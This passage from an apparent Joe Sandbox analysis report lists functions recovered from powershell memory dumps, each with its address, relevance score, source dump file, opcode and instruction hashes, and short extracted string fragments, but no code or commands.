                                                                            • API String ID:
                                                                            • Opcode ID: ea4d10d543028f13f54f4304060a6d48f8df913dcb2558da01b13ae29efceeff
                                                                            • Instruction ID: 1f3c6fb22dfed64b8067651d0c782b163750c3e010ad7c00b87f1ffcf288e24f
                                                                            • Opcode Fuzzy Hash: ea4d10d543028f13f54f4304060a6d48f8df913dcb2558da01b13ae29efceeff
                                                                            • Instruction Fuzzy Hash: 63F0E270E093499FCB01DBA9E41599E7FF4EF46350F4140B9D0548B2A2E7346D0ACBA5
                                                                            Function 091C48AC Relevance: .0, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2878535d4c0117484306d114ea6f47f4c714078ccb590a52c87c85b14d35397
                                                                            • Instruction ID: 0683169a832edaa35421a29020da5c14850f32fa14edf5f0fdcb50bf72489b28
                                                                            • Opcode Fuzzy Hash: c2878535d4c0117484306d114ea6f47f4c714078ccb590a52c87c85b14d35397
                                                                            • Instruction Fuzzy Hash: 9FF08771A05119DBCB009FE0E9A9BADBFB1FF58344F24002CE502AA2A5CB714946EF51
                                                                            Function 091C5B60 Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 69741d5d028e92b4b1983e95cb2bde04b3ffb1d440243a37d2fc9b7eb7c33b37
                                                                            • Instruction ID: 25d8ae9df32fa0c7060243c78c4a2a5ec3b99d1af7c5f3d4189583df0a831ebe
                                                                            • Opcode Fuzzy Hash: 69741d5d028e92b4b1983e95cb2bde04b3ffb1d440243a37d2fc9b7eb7c33b37
                                                                            • Instruction Fuzzy Hash: 8DF0F975E00118AFCB149F98D9409ADBBB2FF88324B248559E915B7260C732AD569B50
                                                                            Function 07823843 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3c238dcbce9a5982661c3b085ba56a6d1df06b5b783913db63a7389ec37d853
                                                                            • Instruction ID: 230554ecdbc760cc881557fc094ee567bd442328f40aad6e5de4fa38a2343f3a
                                                                            • Opcode Fuzzy Hash: a3c238dcbce9a5982661c3b085ba56a6d1df06b5b783913db63a7389ec37d853
                                                                            • Instruction Fuzzy Hash: FEF05CB1341302ABC754CB69C811897F7A1BFA7212B19C18DD0944F9DBCF25D983DB12
                                                                            Function 091C480B Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04f68cee03d8deae62a9ec521828d34e47fe4a2c4d31a6e5a78296bdbaa07455
                                                                            • Instruction ID: 5fd3bd52e249aa99c1d2d48edc78a49286c01355d30f923108bd96beff2d3509
                                                                            • Opcode Fuzzy Hash: 04f68cee03d8deae62a9ec521828d34e47fe4a2c4d31a6e5a78296bdbaa07455
                                                                            • Instruction Fuzzy Hash: 36F06D71A05249DBDB00DFD0D969BADBFB5EF58344F240028E506EB2A4CB714D45EB51
                                                                            Function 091C47C8 Relevance: .0, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3e695ed526c293889b881a143e58fd0fec5d743bfc951674632421e65c482812
                                                                            • Instruction ID: 2d302ade038db8015806ef0008c985e7a4565c333371dda3feadf48d59346225
                                                                            • Opcode Fuzzy Hash: 3e695ed526c293889b881a143e58fd0fec5d743bfc951674632421e65c482812
                                                                            • Instruction Fuzzy Hash: E8F06D71A04249DBDB00DFD0D8A9FAE7FB5EF48344F140028E506AB294CB715845DB51
                                                                            Function 078236F3 Relevance: .0, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05317397baaffa7abb2b75c6176b28cd9ca82e6ceaa8476f516449c126914823
                                                                            • Instruction ID: 9f299462f8532e0a724c112884aa4c82dbd073c7c8033d34a9c576714522c03f
                                                                            • Opcode Fuzzy Hash: 05317397baaffa7abb2b75c6176b28cd9ca82e6ceaa8476f516449c126914823
                                                                            • Instruction Fuzzy Hash: 54F023F92001466FCF25AB64C4604A5FBA5FFAB111718815DD0D44E953CB25DC83DB21
                                                                            Function 091C4B35 Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff91e5fe020f5b620d065cf8d722c463ce43f32e456c083e2f8f8188cd3feb38
                                                                            • Instruction ID: b67d037d1c3642800755554ef023441eb04e354eb08d355c605c4e49dfc91d5e
                                                                            • Opcode Fuzzy Hash: ff91e5fe020f5b620d065cf8d722c463ce43f32e456c083e2f8f8188cd3feb38
                                                                            • Instruction Fuzzy Hash: ABF0A074B4911DDBDB04DFD0E9A9FAE7B75FB18348F20001CE502AA295CB744A09DB56
                                                                            Function 091C4A1B Relevance: .0, Instructions: 25COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e76441769041abd576a6f14b9adc301b8db18001a4f650dcd250fb1335ed2ae
                                                                            • Instruction ID: 7b40e26d57d2335d3f9e6f61b2e1876f2c5301d857488384bc193c4e00b4a6ea
                                                                            • Opcode Fuzzy Hash: 9e76441769041abd576a6f14b9adc301b8db18001a4f650dcd250fb1335ed2ae
                                                                            • Instruction Fuzzy Hash: B7F0A074B49119DBDB04DFD0E8A5FAE7B75FB18348F204018E502AB294CB744A49DB56
                                                                            Function 091C4B0D Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fc363f847205c16a88c5ad2f42865c8c8b46692e66bf51597fab35d22de4326
                                                                            • Instruction ID: c20bfd9fd2d2e867e39195e195aa3accee33f9af3f4ae5296d50f7cb374b78d4
                                                                            • Opcode Fuzzy Hash: 2fc363f847205c16a88c5ad2f42865c8c8b46692e66bf51597fab35d22de4326
                                                                            • Instruction Fuzzy Hash: 40E09270B4920DDBDB049FD0E9AAF6E7F38EB14348F20041CE502AA1A5CBB089449B52
                                                                            Function 091C4A7D Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6bf5c078aa9e8d46af1cc7c941149fd0c2256e5391629fb5f6d26702c275f05
                                                                            • Instruction ID: d57a9a0cf8d0479ecb524af18a6ce8d0699a4279b72a99b987f96481353166bf
                                                                            • Opcode Fuzzy Hash: e6bf5c078aa9e8d46af1cc7c941149fd0c2256e5391629fb5f6d26702c275f05
                                                                            • Instruction Fuzzy Hash: 62E09270B4920DDBDB049FD0E9AAF6E7F38EB14348F200418E502AA195CB7049449B52
                                                                            Function 091C4AA3 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e6bf5c078aa9e8d46af1cc7c941149fd0c2256e5391629fb5f6d26702c275f05
                                                                            • Instruction ID: d57a9a0cf8d0479ecb524af18a6ce8d0699a4279b72a99b987f96481353166bf
                                                                            • Opcode Fuzzy Hash: e6bf5c078aa9e8d46af1cc7c941149fd0c2256e5391629fb5f6d26702c275f05
                                                                            • Instruction Fuzzy Hash: 62E09270B4920DDBDB049FD0E9AAF6E7F38EB14348F200418E502AA195CB7049449B52
                                                                            Function 091C47BC Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009367324.00000000091C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 091C0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_91c0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4cc4217eab73f00a41dc7b7e8e37649350acd199e8970175aa9bbfa821b1293d
                                                                            • Instruction ID: 718d9f21c9350da16c8f47d756517e61b5153f5e936a292c92fccca18011440f
                                                                            • Opcode Fuzzy Hash: 4cc4217eab73f00a41dc7b7e8e37649350acd199e8970175aa9bbfa821b1293d
                                                                            • Instruction Fuzzy Hash: 03D092B0F5D24ADAEB148BC0E5B6BAEAAB06B2034CF61041DE501B55D0DBB446498A96

                                                                            Non-executed Functions

                                                                            Function 0782D045 Relevance: 14.0, Strings: 11, Instructions: 209COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$84l$84l$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q
                                                                            • API String ID: 0-1547436409
                                                                            • Opcode ID: dd767df15e037f3ac8bf270e2a1a6a55caf23e9b52ea1eae478b6c30c7de777e
                                                                            • Instruction ID: 0363772ed8c6783efdaee0b9176ccd22a27b8553ca733435de921011249871b6
                                                                            • Opcode Fuzzy Hash: dd767df15e037f3ac8bf270e2a1a6a55caf23e9b52ea1eae478b6c30c7de777e
                                                                            • Instruction Fuzzy Hash: 267106F1B0022A9FCB189F68C544B6ABFE2EB94606F148459D805CB291DB31D8C7D7B1
                                                                            Function 0928548D Relevance: 10.3, Strings: 8, Instructions: 318COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$84l$84l$tP^q$tP^q$tP^q$tP^q
                                                                            • API String ID: 0-37914593
                                                                            • Opcode ID: d935b78c0e71b9bdfa74321238c5f20d20adb23f7ed1be67dc2e180c4a65ebd6
                                                                            • Instruction ID: a3567178c63499e67dc2a6148b7a5f5a2d8e808d5e00f79409ef67a225952de8
                                                                            • Opcode Fuzzy Hash: d935b78c0e71b9bdfa74321238c5f20d20adb23f7ed1be67dc2e180c4a65ebd6
                                                                            • Instruction Fuzzy Hash: 6CC1CF35B2121ADFCB14AE58C544E6BBBE2BF88351F148895F9019B390DB35DC86CBE1
                                                                            Function 092835C5 Relevance: 10.3, Strings: 8, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$84l$84l$84l$tP^q$tP^q$tP^q$tP^q
                                                                            • API String ID: 0-37914593
                                                                            • Opcode ID: a239c2a6f8f4e97049151a4442ec8d34b5ba01acbcc7c55e256a29fe17dace6c
                                                                            • Instruction ID: 45fe9b3c85d8b6bfb77c98da4b33fcc9a1badb5003b2b6d482ed5dce61f64918
                                                                            • Opcode Fuzzy Hash: a239c2a6f8f4e97049151a4442ec8d34b5ba01acbcc7c55e256a29fe17dace6c
                                                                            • Instruction Fuzzy Hash: 5E910370B212159FCB18EF59C504A6BBBE2BF88B10F148869E8059F3D0DB71EC46CB91
                                                                            Function 0782D146 Relevance: 7.6, Strings: 6, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$84l$d%dq$d%dq$d%dq$tP^q
                                                                            • API String ID: 0-3264296853
                                                                            • Opcode ID: 73d08fb51697c4b35414aa47783c8db26d4bc8fa2e87db38463213813af675d5
                                                                            • Instruction ID: cd3ae8321bd739f3b6b6e3b434bf266304e36c7876026fbe18eed37a36edc705
                                                                            • Opcode Fuzzy Hash: 73d08fb51697c4b35414aa47783c8db26d4bc8fa2e87db38463213813af675d5
                                                                            • Instruction Fuzzy Hash: B03181B1B402299FCB18DF58C444A5ABFE2FB58715F158555E805EB350C731EC829BA1
                                                                            Function 0782237D Relevance: 7.6, Strings: 6, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3669853574
                                                                            • Opcode ID: 07815c709e70f88f6c64cc54d34ff1564ddad86a4a36c9189a9e41c6bbf73f06
                                                                            • Instruction ID: 2dc8d89a963724dbdee6a97180e87b70dfb84849385f2901dfd3bc225d9deb15
                                                                            • Opcode Fuzzy Hash: 07815c709e70f88f6c64cc54d34ff1564ddad86a4a36c9189a9e41c6bbf73f06
                                                                            • Instruction Fuzzy Hash: C11129B1B0822E8FC7284E19844892A77E57FA5A52726416ED841CF339CE70CCC6A791
                                                                            Function 09282A58 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3272787073
                                                                            • Opcode ID: b23992d05c5ade95904f114a657a30853f65754f4b1db7c35e484d3ded10335b
                                                                            • Instruction ID: bb27347e228ba5baa4541f19007b61b17cbcb4e89afb20e1119c9a29be11d970
                                                                            • Opcode Fuzzy Hash: b23992d05c5ade95904f114a657a30853f65754f4b1db7c35e484d3ded10335b
                                                                            • Instruction Fuzzy Hash: 57510930B2620ADFC725AF28C94476B7BE5AF85390F14C4A6E8658F2D1CB31DD85C791
                                                                            Function 0782D38C Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3272787073
                                                                            • Opcode ID: b7c4098bc0ce8129c54d3cde613401db6237b2ffe4972087c7206c38b3c1e963
                                                                            • Instruction ID: d17de3211c050f9e51cbd53d085523fe985ee0a84d0853dd2e12b47ba4dde605
                                                                            • Opcode Fuzzy Hash: b7c4098bc0ce8129c54d3cde613401db6237b2ffe4972087c7206c38b3c1e963
                                                                            • Instruction Fuzzy Hash: 324189B670432ACFCB244E699444676BFE5AFA1213B2444FBC852CB185DA31D4C7D3B1
                                                                            Function 0782E318 Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 84l$XRcq$XRcq$tP^q$$^q
                                                                            • API String ID: 0-2994227698
                                                                            • Opcode ID: 8a454ee3462284b470ae987f76eafd806a7f9b40029359a4f7d8bbafec829a3b
                                                                            • Instruction ID: cee2c5461f3d977c23b1c8778b508b4bcef7c5b92c5b0110626824ebeb22dac1
                                                                            • Opcode Fuzzy Hash: 8a454ee3462284b470ae987f76eafd806a7f9b40029359a4f7d8bbafec829a3b
                                                                            • Instruction Fuzzy Hash: D641C4B0A00229DBCB24CF19C14CBA9B7F2AF69716F59C059D814EB254C731DDC2DB99
                                                                            Function 078253A5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3272787073
                                                                            • Opcode ID: 39cb6d366a9f6d2ff326368bec92274101186dc49e9084d07d31011cfb525c3d
                                                                            • Instruction ID: d4283bedf98d4572fa4807dc49fa4d020620b255b6f2b559c5c15b019e057279
                                                                            • Opcode Fuzzy Hash: 39cb6d366a9f6d2ff326368bec92274101186dc49e9084d07d31011cfb525c3d
                                                                            • Instruction Fuzzy Hash: EE3106F2B8422A8FCB294E658454566F7E1ABE2213B3444EBC805CB255DE31C4E7E791
                                                                            Function 07828948 Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                            • API String ID: 0-3997570045
                                                                            • Opcode ID: 8bcab5ca7dcd05ad1ffae8ed0643e76add4e736eedb982e8683160163620cbb7
                                                                            • Instruction ID: 98588d9585af66d932c9f36a7fafae94fb2932ccd4f51e19b165c00d6ca5ab8e
                                                                            • Opcode Fuzzy Hash: 8bcab5ca7dcd05ad1ffae8ed0643e76add4e736eedb982e8683160163620cbb7
                                                                            • Instruction Fuzzy Hash: EB3106F1A00229DFDF248E06C540B66B7E1AB69716F18C069D916DF281CF31D8C2DF52
                                                                            Function 09282E98 Relevance: 6.3, Strings: 5, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3009982520.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_9280000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: tP^q$$^q$$^q$$^q$$^q
                                                                            • API String ID: 0-324510305
                                                                            • Opcode ID: 049d5d2e7b67458e640b40938b306b60bc1c7f698cac68c2ec49e1a890b45cfd
                                                                            • Instruction ID: 8d45eed868458d0635c74893d361e42bcbc1987473186793ff421b192c2346b5
                                                                            • Opcode Fuzzy Hash: 049d5d2e7b67458e640b40938b306b60bc1c7f698cac68c2ec49e1a890b45cfd
                                                                            • Instruction Fuzzy Hash: 1B210336A2221ADFCB34AE58DA44A77B7F4EF60B90B14405AF9209F395CB31E804C761
                                                                            Function 07829878 Relevance: 5.2, Strings: 4, Instructions: 246COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                            • API String ID: 0-1420252700
                                                                            • Opcode ID: 17564fa289c74ffb0a99ec49e5bae2e58501ab296b4d3e07c3d8679638b3da73
                                                                            • Instruction ID: 708738cfb0bd0536198fd45a6b5adb999eea1f7086187ce5661951449db8c88f
                                                                            • Opcode Fuzzy Hash: 17564fa289c74ffb0a99ec49e5bae2e58501ab296b4d3e07c3d8679638b3da73
                                                                            • Instruction Fuzzy Hash: CB814CB1B043268FCB154B6984103AABBF56FE2222F1484BBC446DB255DA31D8C7D7A2
                                                                            Function 07820E08 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2125118731
                                                                            • Opcode ID: 06a09fef1a8db8c3fd95ca0bd0c552a937d9ce18aea9c0a92fbcae6dc75b8cc8
                                                                            • Instruction ID: c5683ab26015e74abc6827f8c95f67dba8a2136a8ba5f6cbd073aae98214aa43
                                                                            • Opcode Fuzzy Hash: 06a09fef1a8db8c3fd95ca0bd0c552a937d9ce18aea9c0a92fbcae6dc75b8cc8
                                                                            • Instruction Fuzzy Hash: 07214CB970032E7BD724596D9800B27B6DA9BD0716F24882AD505CF385DE36C8C69361
                                                                            Function 07828BD8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.3001293594.0000000007820000.00000040.00000800.00020000.00000000.sdmp, Offset: 07820000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_13_2_7820000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                            • API String ID: 0-2125118731
                                                                            • Opcode ID: df2a8cbae019f0912da5d1ff7c4546148bf8bf961ae02c9f45f9e25074ea97bc
                                                                            • Instruction ID: 9f2742f1b40ebb318c29906656f1d07d55d09d32bb7b3519cc1e1380cff7334b
                                                                            • Opcode Fuzzy Hash: df2a8cbae019f0912da5d1ff7c4546148bf8bf961ae02c9f45f9e25074ea97bc
                                                                            • Instruction Fuzzy Hash: 21110FF1A0232ACBCF748E548904666B7F0AF71622F18447AC804CB215DB31D4CAEB91